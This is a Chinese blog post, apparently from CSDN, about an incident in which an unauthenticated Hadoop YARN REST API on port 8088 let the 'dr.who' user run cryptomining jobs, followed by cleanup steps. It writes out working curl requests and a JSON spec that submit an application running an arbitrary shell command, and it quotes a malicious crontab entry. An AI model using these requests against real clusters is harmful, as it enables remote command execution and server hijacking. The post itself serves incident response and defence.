Hadoop基础之《(8)—yarn dr.who用户漏洞被挖矿》

已于 2023-01-31 15:49:50 修改
阅读量829 收藏
点赞数
分类专栏: 大数据 文章标签: hadoop
于 2023-01-31 15:49:10 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/csj50/article/details/128818638
版权

一、背景
dr.who用户执行了很多application,服务器被挖矿。因为yarn的8088端口REST API没有做权限控制,允许任意用户通过API创建任务

1、创建应用

curl -v -X POST 'http://192.168.1.1:8088/ws/v1/cluster/apps/new-application'

2、构建json文件

{
	"am-container-spec": {
		"commands": {
			"command": "echo '111' > /var/tmp/11112222_test_11112222"

		}
	},
	"application-id": "application_1675146160084_0001",
	"application-name": "test",
	"application-type": "YARN"
}

3、提交任务

curl -s -i -X POST -H 'Accept: application/json' -H 'Content-Type: application/json' http://192.168.1.1:8088/ws/v1/cluster/apps --data-binary @1.json

4、查看执行情况
http://192.168.1.1:8088/cluster/app/application_1675146160084_0001

5、服务器上在/var/tmp/下就写入了11112222_test_11112222文件

二、清理挖矿

1、检查/tmp和/var/tmp目录,删除异常文件

2、检查crontab -l,删除可疑脚本

4 * * * * /root/.systemd-private-x8C8W8llVk0Rzccy9N0ggCOI2VBAc.sh > /dev/null 2>&1 &

3、删除可疑进程

参考资料:
https://paper.seebug.org/611/
https://www.cnblogs.com/wshichang/p/14948393.html

csj50
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
大数据技术之Hadoop(MapReduce&Yarn).docx
03-03
【大数据技术之Hadoop(MapReduce&Yarn)】 Hadoop是一个开源的分布式计算框架,主要由两个关键组件组成:MapReduce和YARN。MapReduce是Hadoop的核心计算模型,用于处理大规模数据集;YARN则是资源管理系统,负责调度...
05.hadoop上课笔记之hadoop5mapreduce和yarn
05-31
Hadoop.MapReduce 和 YARN 笔记 本节笔记主要介绍了 Hadoop.MapReduce 和 YARN 的基本概念、组成部分、工作原理以及实践应用。 一、MapReduce 概念 MapReduce 是 Hadoop 的核心组件之一,负责处理大规模数据。...
Hadoop中的dr.who是什么
说文科技,做有态度的研究。
01-04 1万+
Hadoop中的dr.who是什么? 1.问题 今天在查看自己的hadoop web ui的时候,发现了如下的界面: 仔细看右上角,发现这里登陆的用户名是:dr.who,这个dr.who是谁呢?难道是别黑客入侵了?【一般不可能是黑客入侵,难道我自己的虚拟机集群都值钱?】 2.原因 下面这句话引自《Hadoop权威指南》的chapter 6 中的Setting Up the Development...
Yarn遭到挖矿病毒攻击
01-16 33
迁移到:http://www.itrensheng.com/archives/yarn_virus
hadoop未授权访问命令执行漏洞复现-vulfocus
最新发布
c0529的博客
06-10 541
Hadoop YARN(Yet Another Resource Negotiator)的ResourceManager是集群资源管理的核心组件,负责分配和管理集群资源以及调度作业。如果ResourceManager出现未授权访问漏洞,可能允许未经认证的用户访问或操作集群资源,这可能会导致数据泄露、资源滥用或拒绝服务攻击。在这个复现中就是在组件的ui界面上出现了未授权访问漏洞
Hadoop报错:Permission denied by sticky bit: user=dr.who, path=
weixin_59295776的博客
07-28 504
用户dr.who其实是hadoop中http访问的静态用户名,并没有啥特殊含义,可以在core-default.xml中看到其配置.同时,hdfs的默认配置hdfs-default.xml发现hdfs默认是开启权限检查的。
Hadoop 漏洞复现
MrHatSec的博客
08-01 5905
Hadoop作为一个分布式计算应用程序框架,种类功能繁多,各种组件安全问题会带来很大的攻击面。
日常问题系列——yarn web ui提供kill application功能;登录用户为dr.who,无法查看application运行情况
njuptcyd的博客
05-10 4078
问题一、yarn web ui界面没有办法查看application具体运行情况 Yarn Web UI界面效果如下: 点击一个running 状态的application,会显示如下信息: You (User dr.who) are not authorized to view application application_1557385812521_0002 原因及解决方法 dr.who...
Linux运维-运维课程MP4频-06-大数据之Hadoop部署-23yarn介绍.mp4
06-06
Linux运维-运维课程MP4频-06-大数据之Hadoop部署-23yarn介绍.mp4
hadoop-yarn-api-2.5.1-API文档-中文版.zip
04-23
赠送jar包:hadoop-yarn-api-2.5.1.jar; 赠送原API文档:hadoop-yarn-api-2.5.1-javadoc.jar; 赠送源代码:hadoop-yarn-api-2.5.1-sources.jar; 赠送Maven依赖信息文件:hadoop-yarn-api-2.5.1.pom; 包含翻译后...
Hadoop技术-YARN简介.pptx
11-02
Hadoop 2.x版本之后,YARN成为了Hadoop分布式计算平台的基础,为上层的各种计算框架(如MapReduce、Spark、Tez等)提供了统一的资源管理和任务调度服务。 **YARN的产生背景** 在Hadoop 1.x时代的MapReduce V1...
Hadoop YARN ResourceManager未授权访问漏洞
Kevin's Blog
06-01 5061
文章目录一、介绍1.1 简介1.2 漏洞成因二、模拟环境三、信息收集四、攻击方法五、漏洞防御 一、介绍 1.1 简介   Hadoop作为一个分布式计算应用程序框架,种类功能繁多,各种组件安全问题会带来很大的攻击面。   Apache Hadoop YARNHadoop的核心组件之一,负责将资源分配在Hadoop集群中运行的各种应用程序,并调度要在不同集群节点上执行的任务。(独立出的资源管理框架,负责资源管理和调度) 1.2 漏洞成因   负责对资源进行同一管理调度的ReasourceManager组件的
yarn一直自动生成用户为dr.who的application
weixin_43300503的博客
03-02 3008
之前用三台云服务器搭建完集群后发现任务运行的特别慢 yarn:8088页面后发现有很多奇怪的任务在跑 而且这些任务怎么都完不成还一直在生成,查看各种log日志怎么也没有exception。 后来看了https://www.cnblogs.com/daxiangfei/p/9198856.html 才发现原来是被攻击了。 查看进程发现cup占用异常的高应该是黑客用机器去挖矿了。。。。。 解决方法: ...
Hadoop端口:8088无法访问
qq_45289115的博客
03-08 1万+
{HADOOP_HOME}/etc/hadoop/yarn-site.xml配置文件出错。localhost:8080无法打开。修改yarn-site.xml里的。查看端口是否被占用,并杀死进程。
yarn一直在跑一个用户为dr.who的application
weixin_33738578的博客
06-19 354
现象: 访问yarn:8088页面发现一直有任务在跑如图: 用户为dr.who,问下内部使用人员,都没有任务在跑; 结论: 恭喜你,你中毒了,攻击者利用Hadoop Yarn资源管理系统REST API未授权漏洞对服务器进行攻击,攻击者可以在未授权的情况下远程执行代码的安全问题进行预警 用top命令发现cpu使用了360%多,系统会很卡。 解决办法: 1,通过查看占用cpu高得进...
hadoop】解决浏览器不能访问Hadoop的50070、8088等端口
热门推荐
xiangxiang613的专栏
08-26 4万+
问题: 在虚拟机启动hadoop集群后,在window浏览器无法访问http://master:50070、http://master:8088等集群监控界面。 问题排查: 首先在windows里ping一下是否能通: 若不能ping通,试一下ping IP地址,这里master的IP地址为192.168.128.130. 若IP地址能ping通,则试一下在浏览器中将master换成IP地址访问一下: 如果能利用IP访问,那么可以在Windows里面C:\Windows\System32\drive
hadoop网页权限问题
HXC_Hunter的博客
01-03 1077
完成JDK等一系列操作后启动集群关闭防火墙,跟着老师在web界面上传文件显示:Permission denied: user=dr.who, access=WRITE, inode="/":root:supergroup:drwxr-xr-x。解决方法:在虚拟机输入hadoop fs -chmod -R 777 /在根目录赋予全部权限。
Permission denied: user=dr.who, access=READ_EXECUTE, inode=“/tmp“:root:supergroup:drwxrwx---
qq_56520755的博客
05-07 2277
解决hdfs权限问题导致的 ” hadoop jar “ 运行失败
Hadoop[3.3.x]Permission denied: user=dr.who, access=WRITE, inode=“/“:xxx:supergroup:drwxr-xr-x
雨潇的专栏
04-09 1215
在core-site.xml文件中添加如上配置,然后重启dfs,再回到页面操作文件就正常了。这个用户没有操作的权限,需要给改用户添加页面相关操作的权限。
hadoop集群搭建yarn-site.xml文件
05-16
yarn-site.xml是Hadoop YARN的配置文件之一,主要用于配置YARN资源管理器(ResourceManager)和节点管理器(NodeManager)的相关参数。下面是一个示例yarn-site.xml文件,你可以根据自己的需求进行相应的修改。 ```xml <?xml version="1.0"?> <configuration> <!--YARN ResourceManager配置--> <property> <name>yarn.resourcemanager.hostname</name> <value>your_rm_host_name</value> </property> <property> <name>yarn.resourcemanager.address</name> <value>${yarn.resourcemanager.hostname}:8032</value> </property> <property> <name>yarn.resourcemanager.scheduler.address</name> <value>${yarn.resourcemanager.hostname}:8030</value> </property> <property> <name>yarn.resourcemanager.resource-tracker.address</name> <value>${yarn.resourcemanager.hostname}:8031</value> </property> <property> <name>yarn.resourcemanager.admin.address</name> <value>${yarn.resourcemanager.hostname}:8033</value> </property> <property> <name>yarn.resourcemanager.webapp.address</name> <value>${yarn.resourcemanager.hostname}:8088</value> </property> <!--NodeManager配置--> <property> <name>yarn.nodemanager.local-dirs</name> <value>/tmp/hadoop-yarn/nm-local-dir</value> </property> <property> <name>yarn.nodemanager.log-dirs</name> <value>/tmp/hadoop-yarn/nm-logs</value> </property> <!--NodeManager与ResourceManager通信配置--> <property> <name>yarn.nodemanager.remote-app-log-dir</name> <value>/tmp/hadoop-yarn/logs</value> </property> <property> <name>yarn.nodemanager.log-aggregation-dir</name> <value>/tmp/hadoop-yarn/logs</value> </property> <property> <name>yarn.log.server.url</name> <value>http://${yarn.resourcemanager.hostname}:19888/jobhistory/logs</value> </property> <!--YARN应用程序配置--> <property> <name>yarn.app.mapreduce.am.resource.mb</name> <value>1024</value> </property> <property> <name>yarn.app.mapreduce.am.command-opts</name> <value>-Xmx768m</value> </property> </configuration> ``` 需要注意的是,yarn-site.xml文件需要放置在Hadoop的配置目录下(默认为$HADOOP_HOME/etc/hadoop)。另外,如果你使用的是Hadoop集群,那么该文件需要在所有的节点上进行相应的修改和配置。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值